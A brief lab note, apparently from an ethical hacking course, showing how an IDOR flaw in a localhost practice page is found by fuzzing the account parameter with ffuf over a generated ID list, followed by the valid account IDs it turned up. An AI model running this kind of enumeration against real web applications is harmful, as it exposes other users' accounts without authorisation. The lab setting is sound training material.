Web App - IDOR
Last updated
Last updated
cd $HOME/tcm/peh/webapp
# Create IDs file from 1 to 1000
python3 -c 'for i in range(1,2001): print(i)' > num.txt
ffuf -u 'http://localhost/labs/e0x02.php?account=FUZZ' -w num.txt -fs 849# Valid accounts
1000
1001
1002
1004
1006
1005
1009
1007
1010
1008
1016
1012
1014
1019
1011
1017
1015
1013
1018
1003